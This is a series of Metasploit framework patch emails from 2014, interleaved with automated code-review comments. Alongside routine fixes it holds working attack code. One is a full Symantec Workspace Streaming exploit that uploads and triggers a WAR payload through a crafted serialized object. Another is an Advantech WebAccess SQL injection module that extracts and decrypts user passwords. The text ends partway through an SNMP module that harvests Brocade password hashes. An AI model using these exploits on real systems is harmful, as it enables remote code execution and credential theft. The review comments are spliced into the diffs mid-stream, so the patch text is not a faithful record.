@users.push(result) elsif i < (strings_length / 3) * 2 - @passwords.push(result.text) + @passwords.push(result) else - @passwords2.push(result.text) + @passwords2.push(result) end i = i + 1 end 
@@ -126,13 +126,14 @@ class Metasploit3 < Msf::Auxiliary def run print_status("#{peer} - Exploiting sqli to extract users information...") mark = Rex::Text.rand_text_alpha(8 + rand(5)) + rand = Rex::Text.rand_text_numeric(2) # While installing I can only configure an Access backend, but # according to documentation other backends are supported. This # injection should be compatible, hopefully, with most backends. injection = "#{Rex::Text.rand_text_alpha(8 + rand(5))}' " - injection << "union all select UserName from BAUser where 1=1 " - injection << "union all select Password from BAUser where 1=1 " - injection << "union all select Password2 from BAUser where 1=1 " + injection << "union all select UserName from BAUser where #{rand}=#{rand} " + injection << "union all select Password from BAUser where #{rand}=#{rand} " + injection << "union all select Password2 from BAUser where #{rand}=#{rand} " injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}" data = do_sqli(injection, mark) @@ -150,12 +151,13 @@ class Metasploit3 < Msf::Auxiliary if @users.empty? print_error("#{peer} - Users not found") + return else print_good("#{peer} - #{@users.length} users found!") end users_table = Rex::Ui::Text::Table.new( - 'Header' => 'vBulletin Users', + 'Header' => 'Advantech WebAccess Users', 'Ident' => 1, 'Columns' => ['Username', 'Password Hash', 'Password Hash 2'] ) From bb6201d66d229e0b964cd264820eb4ebf8288cf8 Mon Sep 17 00:00:00 2001 
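Review bot: The new local `rand = Rex::Text.rand_text_numeric(2)` shadows `Kernel#rand`, while the next statement still calls `rand(5)`. Ruby resolves the parenthesised call as a method, so it works, but the two meanings of `rand` within a few lines are easy to misread and a later bare `rand` would yield the string. Renaming the local keeps it unambiguous, e.g. `num = Rex::Text.rand_text_numeric(2)` with `#{num}=#{num}` in the three clauses. `run` continues outside the hunk.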
From: nstarke <starke.nicholas@gmail.com> Date: Wed, 14 May 2014 15:51:42 +0000 Subject: [PATCH 312/853] Fixing nil bug and making format constant MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The date format has been moved into a constant variable. Certain modules do not have a disclosure_date. For example, ‘checkvm’. This necessitated checking disclosure_date for nil before attempting a format conversion. Also, there was an additional location in core.rb that needed the formatting / nil check added. Specs were also updated appropriately. --- lib/msf/ui/console/command_dispatcher/core.rb | 8 +++++--- spec/lib/msf/ui/command_dispatcher/core_spec.rb | 2 +- 2 files changed, 6 insertions(+), 4 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index d9aa5976ce..fc6ff9c35c 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -97,6 +97,8 @@ class Core # mode. DefangedProhibitedDataStoreElements = [ "MsfModulePaths" ] + # Constant for disclosure date formatting in search functions + DISCLOSURE_DATE_FORMAT = "%Y-%m-%d" # Returns the list of commands supported by this command dispatcher def commands { @@ -1488,7 +1490,7 @@ class Core next if not o if not o.search_filter(match) - tbl << [ o.fullname, o.disclosure_date.strftime("%Y-%m-%d"), o.rank_to_s, o.name ] + tbl << [ o.fullname, o.disclosure_date.nil? ? "" : o.disclosure_date.strftime(DISCLOSURE_DATE_FORMAT), o.rank_to_s, o.name ] end end end 
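Review bot: The nil-guarded `o.disclosure_date.nil? ? "" : o.disclosure_date.strftime(DISCLOSURE_DATE_FORMAT)` expression is repeated here, in `search_modules_sql` and in the hunk at line 3239, so a future format change has three places to drift. A small helper would hold it once, e.g. `def format_disclosure_date(date); date.nil? ? "" : date.strftime(DISCLOSURE_DATE_FORMAT); end`. The third site previously emitted `o.disclosure_date||""` unformatted, so confirm the value there responds to `strftime` and is not already a string. The spec also hard-codes `"%Y-%m-%d"` rather than referencing the constant.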
@@ -1503,7 +1505,7 @@ class Core def search_modules_sql(search_string) tbl = generate_module_table("Matching Modules") framework.db.search_modules(search_string).each do |o| - tbl << [ o.fullname, o.disclosure_date.strftime("%Y-%m-%d"), RankingName[o.rank].to_s, o.name ] + tbl << [ o.fullname, o.disclosure_date.nil? ? "" : o.disclosure_date.strftime(DISCLOSURE_DATE_FORMAT), RankingName[o.rank].to_s, o.name ] end print_line(tbl.to_s) end @@ -3239,7 +3241,7 @@ class Core end end if (opts == nil or show == true) - tbl << [ refname, o.disclosure_date||"", o.rank_to_s, o.name ] + tbl << [ refname, o.disclosure_date.nil? ? "" : o.disclosure_date.strftime(DISCLOSURE_DATE_FORMAT), o.rank_to_s, o.name ] end end end diff --git a/spec/lib/msf/ui/command_dispatcher/core_spec.rb b/spec/lib/msf/ui/command_dispatcher/core_spec.rb index 69693eb5b8..f83188c8cf 100644 --- a/spec/lib/msf/ui/command_dispatcher/core_spec.rb +++ b/spec/lib/msf/ui/command_dispatcher/core_spec.rb @@ -82,7 +82,7 @@ describe Msf::Ui::Console::CommandDispatcher::Core do end it 'should have disclosure date in second column' do - cell(printed_table, 0, 1).should include(module_detail.disclosure_date.to_s) + cell(printed_table, 0, 1).should include(module_detail.disclosure_date.strftime("%Y-%m-%d")) end it 'should have rank name in third column' do From dc57e31be1d72a30c6357e904250d4eeb1d1d0ee Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Wed, 14 May 2014 15:03:10 -0500 Subject: [PATCH 313/853] Aux modules don't respect Rank anyway --- modules/auxiliary/dos/hp/data_protector_rds.rb | 1 - modules/auxiliary/dos/tcp/junos_tcp_opt.rb | 3 --- modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb | 1 - 3 files changed, 5 deletions(-) diff --git a/modules/auxiliary/dos/hp/data_protector_rds.rb b/modules/auxiliary/dos/hp/data_protector_rds.rb index d5bd75f748..47699d7fb3 100644 --- a/modules/auxiliary/dos/hp/data_protector_rds.rb +++ b/modules/auxiliary/dos/hp/data_protector_rds.rb 
@@ -6,7 +6,6 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - Rank = ManualRanking include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb index 5118638174..d13a07f95e 100644 --- a/modules/auxiliary/dos/tcp/junos_tcp_opt.rb +++ b/modules/auxiliary/dos/tcp/junos_tcp_opt.rb @@ -10,9 +10,6 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos - # The whole point is to cause a router crash. - Rank = ManualRanking - def initialize super( 'Name' => 'Juniper JunOS Malformed TCP Option', diff --git a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb index 01ad7774b4..3a52efa1a7 100644 --- a/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb +++ b/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb @@ -4,7 +4,6 @@ ## class Metasploit3 < Msf::Auxiliary - Rank = ManualRanking include Msf::Exploit::Remote::Udp #include Msf::Exploit::Remote::SMB From 340956f2944360630d4a8f5c4ab28fd1f54304f5 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Wed, 14 May 2014 15:28:07 -0500 Subject: [PATCH 314/853] Add a newline after DISCLOSURE_DATE_FORMAT --- lib/msf/ui/console/command_dispatcher/core.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index fc6ff9c35c..71e2800b2b 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -99,6 +99,7 @@ class Core # Constant for disclosure date formatting in search functions DISCLOSURE_DATE_FORMAT = "%Y-%m-%d" + # Returns the list of commands supported by this command dispatcher def commands { From b85403ab8fe88c6c026fbda65fe962ce8436c0d3 Mon Sep 17 00:00:00 2001 
From: nstarke <starke.nicholas@gmail.com> Date: Thu, 15 May 2014 16:05:47 +0000 Subject: [PATCH 315/853] Revert "POST module duplicate search results" This reverts commit 0bca3a2d54aaa63cd798cc41b4f4d97f00951708. --- .../post/meterpreter/ui/console/command_dispatcher/core.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index b0d16da36d..6766ce7e7f 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -542,8 +542,9 @@ class Console::CommandDispatcher::Core # fall back to using the scripting interface. if (msf_loaded? and mod = client.framework.modules.create(script_name)) original_mod = mod + reloaded_mod = client.framework.modules.reload_module(original_mod) - unless original_mod + unless reloaded_mod error = client.framework.modules.module_load_error_by_path[original_mod.file_path] print_error("Failed to reload module: #{error}") @@ -551,7 +552,7 @@ class Console::CommandDispatcher::Core end opts = (args + [ "SESSION=#{client.sid}" ]).join(',') - original_mod.run_simple( + reloaded_mod.run_simple( #'RunAsJob' => true, 'LocalInput' => shell.input, 'LocalOutput' => shell.output, From 048aebbdf22b650746734a6f064ab0ee8a2b64af Mon Sep 17 00:00:00 2001 
From: nstarke <starke.nicholas@gmail.com> Date: Thu, 15 May 2014 17:52:11 +0000 Subject: [PATCH 316/853] Search Result Uniqueness MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit SeeRM #8754 Cast the results of the query to an array and perform the uniq function passing a block which provides uniqueness based on the return value, which in this instance is ‘fullname’ This was done because the uniq function in AREL cannot take a specific field for uniqueness, and the sophistication of the query make grouping nearly impossible. Initial testing showed negligible speed difference to the user. --- lib/msf/core/db_manager.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 52d3eac6d5..bc38515141 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -678,7 +678,7 @@ class DBManager union.or(condition) } - query = query.where(unioned_conditions).uniq + query = query.where(unioned_conditions).to_a.uniq { |m| m.fullname } end query From 472f029576b117112baeeed169d45635495eeaa5 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Thu, 15 May 2014 13:27:37 -0500 Subject: [PATCH 317/853] Fix random bug when workstation_name is < 6 chars When the local workstation name is less than 6 characters, remote authentication against a Windows 2008r2 WinRM service always fails. This doesn't seem to affect authentication against IIS's negotiate implementation. --- lib/rex/proto/http/client.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index d29e677839..b8efa19929 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb 
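Review bot: In `lib/msf/core/db_manager.rb` the new `.to_a.uniq { |m| m.fullname }` makes this branch assign an Array to `query`, while the trailing `query` line returns whatever the variable held before when the branch is not taken, presumably still a relation. Callers that chain relation methods on the result would then behave differently depending on the search string, and every matching row is loaded into memory before de-duplication. If the Array is intended, say so above the line, e.g. `# Materialised on purpose: the relation's uniq cannot de-duplicate by fullname`, and check that the other return path gives callers something they can treat the same way. The method begins outside this hunk, so that other path is not visible here.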
@@ -480,7 +480,7 @@ class Client
 opts['headers']||= {}
 ntlmssp_flags = ::Rex::Proto::NTLM::Utils.make_ntlm_flags(ntlm_options)
- workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
+ workstation_name = Rex::Text.rand_text_alpha(rand(8)+6)
 domain_name = self.config['domain']
 b64_blob = Rex::Text::encode_base64(
From 1b68abe95595256c2bc8f7fbe8fcb8d408f68d8d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 15 May 2014 13:41:52 -0500
Subject: [PATCH 318/853] Add module for ZDI-14-127
---
 .../symantec_workspace_streaming_exec.rb | 356 ++++++++++++++++++
 1 file changed, 356 insertions(+)
 create mode 100644 modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb
diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb
new file mode 100644
index 0000000000..9e77e808f0
--- /dev/null
+++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb
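Review bot: `rand(8)+6` in the `lib/rex/proto/http/client.rb` hunk carries a minimum length that only the commit message explains. I would put the reason next to the line, `# Windows 2008r2 WinRM rejects NTLM auth when the workstation name is shorter than 6 characters`, so the bound is not tidied back to 1 later. The enclosing method starts and ends outside the hunk.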
@@ -0,0 +1,356 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'rexml/document' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + include REXML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Symantec Workspace Streaming Arbitrary File Upload', + 'Description' => %q{ + This module exploits a code execution flaw in Symantec Workspace Streaming. The + vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the + as_agent.exe service, which allows to upload arbitrary files under the server root. + This module abuses the auto deploy feature at the JBoss as_ste.exe's instance in order + to achieve remote code execution. This module has been tested successfully on Symantec + Workspace Streaming 6.1 SP8 and Windows 2003 SP2. 
Abused services listen on a single + machine deployment, and also at the backend role in a multiple machines deployment + }, + 'Author' => + [ + 'rgod <rgod[at]autistici.org>', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2014-1649'], + ['BID', '67189'], + ['ZDI', '14-127'], + ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00'] + ], + 'Privileged' => true, + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'Symantec Workspace Streaming 6.1 SP8 / Java Universal', {} ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'May 12 2014')) + + register_options( + [ + Opt::RPORT(9855), # as_agent.exe (afuse XMLRPC to upload arbitrary file) + OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse jboss auto deploy) + ], self.class) + end + + def send_xml_rpc_request(xml) + res = send_request_cgi( + { + 'uri' => normalize_uri("/", "xmlrpc"), + 'method' => 'POST', + 'ctype' => 'text/xml; charset=UTF-8', + 'data' => xml + }) + + res + end + + def build_soap_get_file(file_path) + xml = Document.new + xml.add_element( + "methodCall", + { + 'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions" + }) + method_name = xml.root.add_element("methodName") + method_name.text = "ManagementAgentServer.getFile" + + params = xml.root.add_element("params") + + param_server_root = params.add_element("param") + value_server_root = param_server_root.add_element("value") + value_server_root.text = "*AWESE" + + param_file_type = params.add_element("param") + value_file_type = param_file_type.add_element("value") + type_file_type = value_file_type.add_element("i4") + type_file_type.text = "0" # build path from the server root directory + + param_file_name = params.add_element("param") + value_file_name = param_file_name.add_element("value") + 
value_file_name.text = file_path + + param_file_binary = params.add_element("param") + value_file_binary = param_file_binary.add_element("value") + type_file_binary = value_file_binary.add_element("boolean") + type_file_binary.text = "0" + + xml << XMLDecl.new("1.0", "UTF-8") + + xml.to_s + end + + def build_soap_put_file(file) + xml = Document.new + xml.add_element( + "methodCall", + { + 'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions" + }) + method_name = xml.root.add_element("methodName") + method_name.text = "ManagementAgentServer.putFile" + + params = xml.root.add_element("params") + + param_server_root = params.add_element("param") + value_server_root = param_server_root.add_element("value") + value_server_root.text = "*AWESE" + + param_file_type = params.add_element("param") + value_file_type = param_file_type.add_element("value") + type_file_type = value_file_type.add_element("i4") + type_file_type.text = "0" # build path from the server root directory + + param_file = params.add_element("param") + value_file = param_file.add_element("value") + type_value_file = value_file.add_element("ex:serializable") + type_value_file.text = file + + xml << XMLDecl.new("1.0", "UTF-8") + + xml.to_s + end + + def build_soap_check_put + xml = Document.new + xml.add_element( + "methodCall", + { + 'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions" + }) + method_name = xml.root.add_element("methodName") + method_name.text = "ManagementAgentServer.putFile" + xml.root.add_element("params") + xml << XMLDecl.new("1.0", "UTF-8") + xml.to_s + end + + def parse_method_response(xml) + doc = Document.new(xml) + file = XPath.first(doc, "methodResponse/params/param/value/ex:serializable") + + unless file.nil? 
+ file = Rex::Text.decode_base64(file.text) + end + + file + end + + def get_file(path) + xml_call = build_soap_get_file(path) + file = nil + + res = send_xml_rpc_request(xml_call) + + if res && res.code == 200 && res.body + file = parse_method_response(res.body.to_s) + end + + file + end + + def put_file(file) + result = nil + xml_call = build_soap_put_file(file) + + res = send_xml_rpc_request(xml_call) + + if res && res.code == 200 && res.body + result = parse_method_response(res.body.to_s) + end + + result + end + + def upload_war(war_name, war, dst) + result = false + java_file = build_java_file_info("#{dst}#{war_name}", war) + java_file = Rex::Text.encode_base64(java_file) + + res = put_file(java_file) + + if res && res =~ /ReturnObject.*StatusMessage.*Boolean/ + result = true + end + + result + end + + def jboss_deploy_path + path = nil + leak = get_file("bin/CreateDatabaseSchema.cmd") + + if leak && leak =~ /\[INSTALLDIR\](.*)ste\/ste.jar/ + path = $1 + end + + path + end + + def check + check_result = Exploit::CheckCode::Safe + + if jboss_deploy_path.nil? + xml = build_soap_check_put + res = send_xml_rpc_request(xml) + + if res && res.code == 200 && res.body && res.body.to_s =~ /No method matching arguments/ + check_result = Exploit::CheckCode::Detected + end + else + check_result = Exploit::CheckCode::Appears + end + + check_result + end + + def exploit + print_status("#{peer} - Leaking the jboss deployment directory...") + jboss_path =jboss_deploy_path + + if jboss_path.nil? 
+ fail_with(Exploit::Unknown, "#{peer} - Failed to disclose the jboss deployment directory") + end + + print_status("#{peer} - Building WAR payload...") + + app_name = Rex::Text.rand_text_alpha(4 + rand(4)) + war_name = "#{app_name}.war" + war = payload.encoded_war({ :app_name => app_name }).to_s + deploy_dir = "..#{jboss_path}" + + print_status("#{peer} - Uploading WAR payload...") + + res = upload_war(war_name, war, deploy_dir) + + unless res + fail_with(Exploit::Unknown, "#{peer} - Failed to upload the war payload") + end + + register_files_for_cleanup("../server/appstream/deploy/#{war_name}") + + 10.times do + select(nil, nil, nil, 2) + + # Now make a request to trigger the newly deployed war + print_status("#{rhost}:#{ste_port} - Attempting to launch payload in deployed WAR...") + res = send_request_cgi( + { + 'uri' => normalize_uri("/", app_name, Rex::Text.rand_text_alpha(rand(8)+8)), + 'method' => 'GET', + 'rport' => ste_port # Auto Deploy can be reached through the "as_ste.exe" service + }) + # Failure. The request timed out or the server went away. + break if res.nil? + # Success! 
Triggered the payload, should have a shell incoming + break if res.code == 200 + end + + end + + def ste_port + datastore['STE_PORT'] + end + + # com.appstream.cm.general.FileInfo serialized object + def build_java_file_info(file_name, contents) + stream = "\xac\xed" # stream magic + stream << "\x00\x05" # stream version + stream << "\x73" # new Object + + stream << "\x72" # TC_CLASSDESC + stream << ["com.appstream.cm.general.FileInfo".length].pack("n") + stream << "com.appstream.cm.general.FileInfo" + stream << "\xa3\x02\xb6\x1e\xa1\x6b\xf0\xa7" # class serial version identifier + stream << "\x02" # flags SC_SERIALIZABLE + stream << [6].pack("n") # number of fields in the class + + stream << "Z" # boolean + stream << ["bLastPage".length].pack("n") + stream << "bLastPage" + + stream << "J" # long + stream << ["lFileSize".length].pack("n") + stream << "lFileSize" + + stream << "[" # array + stream << ["baContent".length].pack("n") + stream << "baContent" + stream << "\x74" # TC_STRING + stream << ["[B".length].pack("n") + stream << "[B" # field's type (byte array) + + stream << "L" # Object + stream << ["dTimeStamp".length].pack("n") + stream << "dTimeStamp" + stream << "\x74" # TC_STRING + stream << ["Ljava/util/Date;".length].pack("n") + stream << "Ljava/util/Date;" #field's type (Date) + + stream << "L" # Object + stream << ["sContent".length].pack("n") + stream << "sContent" + stream << "\x74" # TC_STRING + stream << ["Ljava/lang/String;".length].pack("n") + stream << "Ljava/lang/String;" #field's type (String) + + stream << "L" # Object + stream << ["sFileName".length].pack("n") + stream << "sFileName" + stream << "\x71" # TC_REFERENCE + stream << [0x007e0003].pack("N") # handle + + stream << "\x78" # TC_ENDBLOCKDATA + stream << "\x70" # TC_NULL + + # Values + stream << [1].pack("c") # bLastPage + + stream << [0xffffffff, 0xffffffff].pack("NN") # lFileSize + + stream << "\x75" # TC_ARRAY + stream << "\x72" # TC_CLASSDESC + stream << ["[B".length].pack("n") + 
stream << "[B" # byte array) + stream << "\xac\xf3\x17\xf8\x06\x08\x54\xe0" # class serial version identifier + stream << "\x02" # flags SC_SERIALIZABLE + stream << [0].pack("n") # number of fields in the class + stream << "\x78" # TC_ENDBLOCKDATA + stream << "\x70" # TC_NULL + stream << [contents.length].pack("N") + stream << contents # baContent + + stream << "\x70" # TC_NULL # dTimeStamp + + stream << "\x70" # TC_NULL # sContent + + stream << "\x74" # TC_STRING + stream << [file_name.length].pack("n") + stream << file_name # sFileName + + stream + end + +end From 9091ce443a084746c405278d8a8bd11b1566ff44 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 16 May 2014 00:59:27 -0500 Subject: [PATCH 319/853] Add suport to decode passwords --- .../advantech_webaccess_dbvisitor_sqli.rb | 120 ++++++++++++++++-- 1 file changed, 110 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index fc0b0b772a..8985ee25e3 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -114,9 +114,9 @@ class Metasploit3 < Msf::Auxiliary if i < (strings_length / 3) @users.push(result) elsif i < (strings_length / 3) * 2 - @passwords.push(result) + @enc_passwords.push(result) else - @passwords2.push(result) + @keys.push(result) end i = i + 1 end @@ -143,8 +143,9 @@ class Metasploit3 < Msf::Auxiliary end @users = [] - @passwords = [] - @passwords2 = [] + @enc_passwords = [] + @keys = [] + @plain_passwords = [] print_status("#{peer} - Parsing extracted data...") parse_users(data, mark) 
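Review bot: `build_soap_get_file`, `build_soap_put_file` and `build_soap_check_put` in the new `symantec_workspace_streaming_exec.rb` each rebuild the same `methodCall` document, namespace attribute and `XMLDecl`, and the `soap` in their names is misleading because `send_xml_rpc_request` posts XML-RPC. One private builder that takes the method name and yields the `params` element would remove the duplication. `jboss_deploy_path` reads its capture through `$1`; `Regexp.last_match(1)` or a named group is easier to follow, and the `.` in `ste.jar` should be escaped as `ste\.jar`. `parse_method_response` reuses `file` for both the XML node and the decoded bytes, which a second local would make clearer.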
@@ -159,26 +160,125 @@ class Metasploit3 < Msf::Auxiliary users_table = Rex::Ui::Text::Table.new( 'Header' => 'Advantech WebAccess Users', 'Ident' => 1, - 'Columns' => ['Username', 'Password Hash', 'Password Hash 2'] + 'Columns' => ['Username', 'Encrypted Password', 'Key', 'Recovered password'] ) for i in 0..@users.length - 1 + @plain_passwords[i] = decrypt_password(@enc_passwords[i], @keys[i]) + @plain_passwords[i] = "(blank password)" if @plain_passwords[i].empty? report_auth_info({ :host => rhost, :port => rport, :user => @users[i], - :pass => "#{@passwords[i]}:#{@passwords2[i]}", - :type => "hash", + :pass => @plain_passwords[i], + :type => "password", :sname => (ssl ? "https" : "http"), - :proof => data # Using proof to store the hash salt + :proof => "Leaked encrypted password: #{@enc_passwords[i]}:#{@keys[i]}" }) - users_table << [@users[i], @passwords[i], @passwords2[i]] + users_table << [@users[i], @enc_passwords[i], @keys[i], @plain_passwords[i]] end print_line(users_table.to_s) - end + def decrypt_password(password, key) + recovered_password = recover_password(password) + recovered_key = recover_key(key) + + recovered_bytes = decrypt_bytes(recovered_password, recovered_key) + password = [] + + recovered_bytes.each { |b| + if b == 0 + break + else + password.push(b) + end + } + + return password.pack("C*") + end + + def recover_password(password) + bytes = password.unpack("C*") + recovered = [] + + i = 0 + j = 0 + while i < 16 + low = bytes[i] + + if low < 0x41 + low = low - 0x30 + else + low = low - 0x37 + end + + low = low * 16 + + high = bytes[i+1] + if high < 0x41 + high = high - 0x30 + else + high = high - 0x37 + end + + recovered_byte = low + high + + recovered[j] = recovered_byte + + i = i + 2 + j = j + 1 + end + + recovered + end + + def recover_key(key) + bytes = key.unpack("C*") + recovered = 0 + + bytes[0, 8].each { |b| + recovered = recovered * 16 + if b < 0x41 + byte_weight = b - 0x30 + else + byte_weight = b - 0x37 + end + + recovered = 
recovered + byte_weight + } + + recovered + end + + def decrypt_bytes(bytes, key) + result = [] + xor_table = [0xaa, 0xa5, 0x5a, 0x55] + key_copy = key + for i in 0..7 + byte = (crazy(bytes[i] ,8 - (key & 7)) & 0xff) + result.push(byte ^ xor_table[key_copy & 3]) + key_copy = key_copy / 4 + key = key / 8 + end + + result + end + + def crazy(byte, magic) + result = byte & 0xff + + while magic > 0 + result = result * 2 + if result & 0x100 == 0x100 + result = result + 1 + end + magic = magic - 1 + end + + result + end end From 7ec85c9d3a4de5f47628ee4fa154caa1f0ced465 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 16 May 2014 01:03:04 -0500 Subject: [PATCH 320/853] Delete blank lines --- .../admin/scada/advantech_webaccess_dbvisitor_sqli.rb | 5 ----- 1 file changed, 5 deletions(-) diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 8985ee25e3..88bb7830ba 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -207,13 +207,11 @@ class Metasploit3 < Msf::Auxiliary j = 0 while i < 16 low = bytes[i] - if low < 0x41 low = low - 0x30 else low = low - 0x37 end - low = low * 16 high = bytes[i+1] @@ -224,9 +222,7 @@ class Metasploit3 < Msf::Auxiliary end recovered_byte = low + high - recovered[j] = recovered_byte - i = i + 2 j = j + 1 end @@ -245,7 +241,6 @@ class Metasploit3 < Msf::Auxiliary else byte_weight = b - 0x37 end - recovered = recovered + byte_weight } From 3c1363b990765f72ce8f4657d6564f59de1075c1 Mon Sep 17 00:00:00 2001 
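Review bot: `recover_password` and `recover_key` in the `@@ -159,26 +160,125 @@` hunk of `advantech_webaccess_dbvisitor_sqli.rb` hand-decode hex digits with `- 0x30` / `- 0x37`, which silently yields wrong values for lowercase digits and raises `NoMethodError` on `nil` when the input is shorter than 16 or 8 characters. In `recover_password` the names are also swapped: `low` holds the first digit, which is the high nibble. `[password[0, 16]].pack("H*").unpack("C*")` and `key[0, 8].to_i(16)` express the same decoding, and a length check before either would make the failure explicit. `crazy` appears to implement an 8-bit rotate-left (the caller masks the result with `0xff`) and would read better as `rotate_left8(byte, count)` with a one-line comment.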
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Fri, 16 May 2014 08:32:46 -0500
Subject: [PATCH 321/853] Add new SNMP enumeration modules
---
 .../scanner/snmp/brocade_enumhash.rb | 74 ++++++++
 .../auxiliary/scanner/snmp/netopia_enum.rb | 102 +++++++++++
 .../auxiliary/scanner/snmp/ubee_ddw3611.rb | 159 ++++++++++++++++++
 3 files changed, 335 insertions(+)
 create mode 100644 modules/auxiliary/scanner/snmp/brocade_enumhash.rb
 create mode 100644 modules/auxiliary/scanner/snmp/netopia_enum.rb
 create mode 100644 modules/auxiliary/scanner/snmp/ubee_ddw3611.rb
diff --git a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb
new file mode 100644
index 0000000000..b06f16ec29
--- /dev/null
+++ b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb
@@ -0,0 +1,74 @@
+#
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::SNMPClient
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'Brocade Password Hash Enumeration',
+ 'Description' => %q{
+ This module extracts password hashes from certain Brocade load
+ balancer devices.
+ },
+ 'References' =>
+ [
+ [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/05/15/r7-2014-01-r7-2014-02-r7-2014-03-disclosures-exposure-of-critical-information-via-snmp-public-community-string' ]
+ ],
+ 'Author' => ['Deral "PercentX" Heiland'],
+ 'License' => MSF_LICENSE
+ )
+
+ end
+
+ def run_host(ip)
+ begin
+ snmp = connect_snmp
+
+ if snmp.get_value('sysDescr.0') =~ /Brocade/
+
+ @users = []
+ snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.1") do |row|
+ row.each { |val| @users << val.value.to_s }
+ end
+
+ @hashes = []
+ snmp.walk("1.3.6.1.4.1.1991.1.1.2.9.2.1.2") do |row|
+ row.each { |val| @hashes << val.value.to_s }
+ end
+
+ print_good("#{ip} Found Users & Password Hashes:")
+ end
+
+ credinfo = ""
+ @users.each_index do |i|
+ credinfo << "#{@users[i]}:#{@hashes[i]}" << "\n"
+ print_good("#{@users[i]}:#{@hashes[i]}")
+ end
+
+
+ #Woot we got loot.
